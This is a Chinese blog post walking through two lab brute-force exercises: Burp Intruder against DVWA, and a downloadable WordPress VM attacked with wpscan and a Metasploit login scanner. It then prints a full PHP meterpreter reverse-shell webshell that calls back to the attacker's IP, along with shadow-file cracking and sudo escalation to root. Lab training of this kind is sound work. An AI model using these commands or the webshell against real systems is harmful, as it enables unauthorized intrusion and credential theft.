WEB安全实战(带靶场)–暴力破解

已于 2022-02-28 17:54:34 修改
阅读量6.8k 收藏 9
点赞数
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: web安全
于 2022-02-28 17:50:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/renxq097/article/details/123185135
本文详细介绍了Web安全中的暴力破解概念,包括DVWA靶场的暴力破解实例,以及如何利用Burpsuite进行爆破。接着展示了针对WordPress的暴力破解过程,利用Metasploit进行密码攻击,并最终实现权限提升。实验涵盖了信息探测、漏洞挖掘及利用,以及Webshell生成和提权技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

WEB安全实战(带靶场)–暴力破解

靶场一:DVWA中的暴力破解

靶场二:靶场实验 暴力破解

暴力破解百度云链接(失效请在评论区通知)
链接:https://pan.baidu.com/s/1FcNFC27VFBfQy0ZMnB_TAg
提取码:1234

Brute Force(暴力破解)

Brute Force是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一,如2014年轰动全国的12306“撞库”事件,实质就是暴力破解攻击,Web安全中的暴力破解也是利用尝试所有的可能性最终获取正确的结果。

靶场一:DVWA中的暴力破解

DVWA暴力破解--low

源码解析
if( isset( $_GET[ 'Login' ] ) ) {
    # 获取用户名和密码
    $user = $_GET[ 'username' ];
    $pass = $_GET[ 'password' ];
    $pass = md5( $pass );
 
    # 查询验证用户名和密码
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );
 
    if( $result && mysql_num_rows( $result ) == 1 ) {
      # 输出头像和用户名
      $avatar = mysql_result( $result, 0, "avatar" );
      echo "<p>Welcome to the password protected area {$user}</p>";
    }
    else {
        登录失败
    }
    mysql_close();
}

Isset

检测变量是否已声明并且其值不为 null
(https://www.php.net/manual/zh/function.isset.php)
若变量不存在则返回 FALSE 
若变量存在且其值为NULL,也返回 FALSE 
若变量存在且值不为NULL,则返回 TURE 
同时检查多个变量时,每个单项都符合上一条要求时才返回 TRUE,否则结果为 FALSE
如果已经使用 unset() 释放了一个变量之后,它将不再是 isset()。
若使用 isset() 测试一个被设置成 NULL 的变量,将返回 FALSE。同时要注意的是一个 NULL 字节("\0")并不等同于 PHP 的 NULL 常数。

$_GET 和 $_POST

PHP 超全局变量 $_GET 和 $_POST 用于收集表单数据
$_GET 是通过 URL 参数传递到当前脚本的变量数组。
$_POST 是通过 HTTP POST 传递到当前脚本的变量数组。

mysql_query() 函数

执行一条 MySQL 查询

mysql_error() 函数

返回上一个 MySQL 操作产生的文本错误信息。

mysql_num_rows() 函数

返回结果集中行的数目。

mysql_result()函数

返回结果集中一个字段的值,如果成功,则该函数返回字段值。如果失败,则返回 false

综上所述:未做登录验证码以及登录次数限制,这是初级代码,还存在sql注入。

漏洞利用

第一步:使用burpsuite抓包
在这里插入图片描述

第二步:ctrl+I将包复制到intruder模块,因为要对username(为了节省时间这里直接用admin)和password参数进行爆破,所以在password参数的内容两边加$
在这里插入图片描述

第三步:选中Payloads,载入字典,点击Start attack进行爆破
在这里插入图片描述获取到密码为password

实验一结束

靶场二:靶场实验 暴力破解

实验环境

攻击机:kali
IP:192.168.31.15
在这里插入图片描述
靶场机器:暴力破解.ova(Ubuntu)
IP:192.168.31.86
在这里插入图片描述

信息探测

扫描主机服务信息以及服务版本

nmap -T4 -A -v 靶场IP地址

在这里插入图片描述

探测敏感信息

nikto -host http://靶场IP地址:端口

在这里插入图片描述

扫描网页目录(这里后期补充换了一下ip,不影响观看)

dirb http://ip:端口

在这里插入图片描述在这里插入图片描述

漏洞挖掘

打开WEB首页

在这里插入图片描述

查看站点敏感目录:/secret/

在这里插入图片描述

打开后台登录页面

在这里插入图片描述

漏洞利用

Wordpress用户名枚举(需要联网)

wpscan --url URL ----enumerate u

在这里插入图片描述

发现用户名admin
在这里插入图片描述

利用Metasploit 进行密码暴力破解

msfconsole

在这里插入图片描述

利用wordpress用户枚举模块
在这里插入图片描述在这里插入图片描述

msf6 > use auxiliary/scanner/http/wordpress_login_enum

在这里插入图片描述

#设置登陆名为admin
msf6 auxiliary(scanner/http/wordpress_login_enum) > set username admin   
                                                                                
#设置目标ip                                                                                                                   
msf6 auxiliary(scanner/http/wordpress_login_enum) > set rhosts 192.168.31.86                                                                            

#设置目标目录为/secret/
msf6 auxiliary(scanner/http/wordpress_login_enum) > set targeturi /secret/

#设置字典文件路径                                                                                                                      
msf6 auxiliary(scanner/http/wordpress_login_enum) > set pass_file /usr/share/wordlists/dirb/common.txt      
                                                                                                                                                                                    
#开始攻击                                                                                                                                                                                                                           
msf6 auxiliary(scanner/http/wordpress_login_enum) > run

在这里插入图片描述

发现密码为admin
在这里插入图片描述

Tips:页面登陆 如果发现登陆页面跳转失败
在这里插入图片描述
修改host文件进行ip映射
在这里插入图片描述
顺利打开:用户名:admin 密码:admin
在这里插入图片描述
登陆成功
在这里插入图片描述

漏洞提权

生成webshell(php木马文件)

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.31.15 lport=4444 -f raw

在这里插入图片描述

源码附上

<?php /**/ error_reporting(0); $ip = '192.168.31.15'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

在这里插入图片描述

运行404.php文件

http://192.168.31.86/secret/wp-content/themes/twentyseventeen/404.php

在这里插入图片描述

Msf反弹shell
在这里插入图片描述在这里插入图片描述

下载用户密码以及影子文件进行破解
在这里插入图片描述
在这里插入图片描述
获取到用户名以及密码:marlinspike (marlinspike)

shell提权(利用python模块pty)

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

切换为marlinspike用户
在这里插入图片描述

查看sudo权限
在这里插入图片描述
切换为root权限
在这里插入图片描述
在这里插入图片描述

获取到flag值 实验结束

web安全攻防实战
qq_44806973的博客
09-02 1799
WEB安全渗透工具docker容器安装三级目录 渗透工具 1.burpsuite 2.curl 3.postman 4.wappalyzer 5.hackbar docker容器安装 [docker下载地址(https://www.docker.com/products/docker-desktop) 三级目录
【网络安全】-暴力破解实战-pikachu/墨者靶场
weixin_65311462的博客
09-03 1112
双载荷暴力破解:目标:pikachu-master 基于表单的暴力破解
Web安全攻防_渗透测试实战指南
Karka_的博客
06-15 476
第1章 渗透测试之信息收集1.1收集域名信息1.1.1Whois查询1.1.2备案信息查询1.2收集敏感信息1.3收集子域名信息1.4收集常用端口信息1.5指纹识别1.6查找真实IP1.7收集敏感目录文件1.8社会工程学。
暴力破解-vulnhub靶场
最新发布
2302_77028142的博客
06-09 493
通过浏览器访问。
Pikachu漏洞靶场 Burte Force(暴力破解
柠檬i的博客
04-04 4356
暴力破解”是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。为了提高效率,暴力破解一般会使用有字典的工具来进行自动化操作。
web类靶机暴力破解
信息安全专题
10-21 310
信息探测 信息探测与之前的探测策略一样 深入挖掘 http://192.168.56.103/secret/ 但是这里并没有获取root权限,只是一个比普通用户权限,我们使用。 su - marlinspike sudo -l sudo bash 1 2 3 返回root权限了。 获取flag 总结 ...
WEB安全-靶场
深度安全实验室
07-05 470
靶场
pikachu靶场暴力破解
qq_53238442的博客
10-18 2368
今天凌晨睡不着,想着出一期pikachu靶场暴力破解模块。 暴力破解简介 简单的介绍 准备工作 ok准备工作完成!我们废话少说直接进行靶场实操???? 一、基于表单的暴力破解 二、验证码绕过(on server) 三、验证码绕过(on client) 四、token放爆破? 暴力破解简介 “暴力破解”是一种攻击手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。过程就是,使用大量的认证信息在认证接口进行登录尝试,直到得到正确的结果。为了提高效率,一般会采用...
网络安全实战靶场渗透技术
kali_Ma的博客
10-20 8740
靶机主要是从信息收集开始,发现是flask搭建的,然后使用flask unsign进行解密,暴力破解。接着使用枚举出的用户进行FTP登录,FTP登录之后,下载pdf文件,发现管理员账号和密码规则,然后登录FTP管理员,接着下载压缩包,进行文件分析,发现可以使用CVE-2021-23639历史漏洞可以获取权限,在文件中发现存在mysql服务,接着进行权限提升,获取到了root文件。
web安全-dvwa实战
07-05
本文档旨在提供DVWA靶场的攻略和实践技巧,帮助用户更好地理解和应对Web应用程序漏洞,其主要分类为 1。DVWA部署暴力破解:介绍如何使用DVWA模拟暴力破解攻击,即通过尝试大量的用户名和密码组合来尝试登录系统,以...
Burpsuite靶场|使用成功登录破除IP限制后暴力破解密码
TangGo_Nosugar的博客
05-29 2300
Burpsuite靶场|使用成功登录破除IP限制后暴力破解密码
webug3.0渗透测试靶场
05-07
webug3.0渗透测试靶场!从官方虚拟机中提取出来的!代码优化,去除重复的文件!内附安装介绍及搭建工具!
web靶场——xss-labs靶机平台的搭建和代码审计
weixin_51525416的博客
09-05 6427
web靶场-xss-labs靶机平台的搭建和代码审计
BurpSuite实战教程01-web渗透安全测试(靶场搭建及常见漏洞攻防)
zzz6583zz的博客
05-09 3196
渗透测试(Penetrationtest)即安全工程师模拟黑客,在合法授权范围内,通过信息搜集、漏洞挖掘、权限提升等行为,对目标对象进行安全测试(或攻击),最终找出安全风险并输出测试报告。Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透。Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。
WEB靶场搭建教程(PHPstudy+SQLllib+DVWA+upload-labs)
SunshiningFire的博客
01-11 7870
WEB靶场搭建教程(PHPstudy+SQLllib+DVWA+upload-labs)0x00 简介0x01 PHPstudy0x02 搭建SQLi-labs靶场0x03 搭建DVWA靶场0x04 搭建upload-labs靶场0x05 END WEB靶场搭建教程 0x00 简介 渗透测试靶场基于“未知功焉知防”的理念,通过模拟真实的漏洞环境不断地训练和提高使用者的渗透测试技巧和能力,本次为大家来几款热门的WEB靶场。 0x01 PHPstudy 作为一名积极进取的渗透从业者,电脑上肯定不止一个靶场,这
web靶场通关
2401_86784093的博客
11-17 672
upload通关
Web综合靶场-LazysysAdmin
weixin_46601374的博客
05-20 1554
果然花学校的钱我一点都不心疼。 nmap -sV --allports bad97dda.lxctf.net 御剑和dirsearch 扫一些目录 py dirsearch.py -u http://cd1928d1.lxctf.net/ 有robots.txt,去看看 disallow,我才不信,我偏要去看看 Index of /old (lxctf.net)http://cd1928d1.lxctf.net/old/ 貌似啥都没有,但...
web安全的常用靶场
Hackerdoors
04-08 4651
文章目录1 sqlmap2 Test Lab 方便测试,列出以下WEB靶场,仅供参考! 1 sqlmap 0 作者出的漏洞测试环境 sqlmap 1 owasp 2 owaspbwa 3 xvwa 4 webgoad 5 DVWA 6 sqli lab 7 xss chellenges: 8 javascript挑战: 2 Test Lab https://lab.pentestit.ru/pentestlabs/4 http://www.freebuf.com/articles/web/10212
vulnstack-Web安全入门进阶实战靶场配置
orange777
02-02 1871
Web安全入门进阶实战课程靶场为我们提供了很多web攻击靶场,免去了自己搭建过程中遇到的各种问题。但是在实际搭建过程中,发现配置上还有有点小问题,记录一下。 因为默认配置是127.0.0.1,也就是说只能在本地访问,其它主机想去访问则访问不到。有时候需要用到集成工具如果kali等其它辅助渗透的时候会不太方便,这里记录下修改配置记录。
burp靶场 apprentice
02-27
### Burp Suite Apprentice 版本靶场及练习环境使用教程 #### 安装与配置 Burp Suite Burp Suite 是一款广泛使用的 Web 应用程序安全测试工具,Apprentice 版本适合初学者学习和实践。为了更好地理解和掌握 Burp Suite 的功能,在开始之前需要确保已经成功安装并熟悉基本操作。 对于初次使用者来说,可以从 PortSwigger 官方网站获取最新版的 Burp Suite 并按照官方指南完成设置过程[^1]。一旦安装完毕,则可以通过浏览器代理流量到此软件来进行 HTTP(S) 请求拦截、修改以及分析等工作流。 #### 设置 Burp Suite 代理 启动应用程序之后,进入 `Proxy` -> `Options` 菜单项下调整监听端口,默认情况下会自动检测本地网络接口;如果遇到特殊情况需手动指定IP地址或更改默认8080端口号时可在此处进行相应改动。另外还需注意SSL证书部分,因为HTTPS加密通信也需要被解密以便于后续审计工作开展,所以要信任自签名CA根证书,并将其导出安装至客户端设备上以实现无缝透明截获所有类型的Web交互数据包。 #### 利用内置靶场资源 PortSwigger 提供了一个名为「Web Security Academy」的学习平台,里面包含了大量针对不同漏洞类目的实战演练场景,其中包括但不限于SQL注入、XSS跨站脚本攻击、命令执行等高危风险案例研究。特别是提到的文件上传漏洞实验项目能够帮助学员深入了解如何利用Burp Suite识别潜在的安全隐患点,并采取有效措施加以防范[^2]。 具体而言: - **访问在线课程页面**:前往 [PortSwigger 学院](https://portswigger.net/web-security),注册账户后即可解锁各类培训资料; - **选择感兴趣的主题领域**:比如服务器端漏洞入门路径(Server-Side Vulnerabilities Apprentice),跟随指引逐步深入探索各个知识点; - **动手实操环节**:每一个理论讲解后面都会附相应的虚拟机镜像或者云服务实例链接,允许学生在一个受控环境中自由发挥创造力去尝试破解难题。 #### 用户名枚举漏洞复盘 在实际渗透测试过程中经常会碰到基于表单认证机制的服务端应用,这时就需要特别留意是否存在因不当处理而泄露敏感信息的可能性。例如当提交不存在的用户名时返回“无效用户名”,而对于已存在的记录则提示“密码错误”。这种差异化的反馈模式很容易成为攻击者实施暴力猜解策略的重要线索之一[^3]。 ```bash # 假设我们正在审查某个登录API接口 POST /login HTTP/1.1 Host: vulnerable.web.app Content-Type: application/x-www-form-urlencoded username=alice&password=testpass ``` 通过上述请求结构可以看出,正常情况下无论输入何种参数组合都应该得到统一格式的结果集而不是区分对待。因此建议开发人员遵循最小化暴露原则设计响应消息体内容,避免给恶意行为提供任何额外的帮助。 #### 密码爆破技巧分享 考虑到效率因素,在不知道确切目标的情况下通常推荐采用分步式方法逐一验证可能选项而非一次性穷尽整个候选空间。假设存在两个长度均为n位字符组成的列表分别代表合法账号集合A={a₁,a₂,...,an} 和对应私钥B={b₁,b₂,...bn},那么理论上讲前者所需尝试次数大约等于两倍的数量级即O(2n),远小于后者所需的平方级别复杂度 O()[^3]. 综上所述,合理规划测试计划不仅可以节省时间成本还能提高成功率概率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值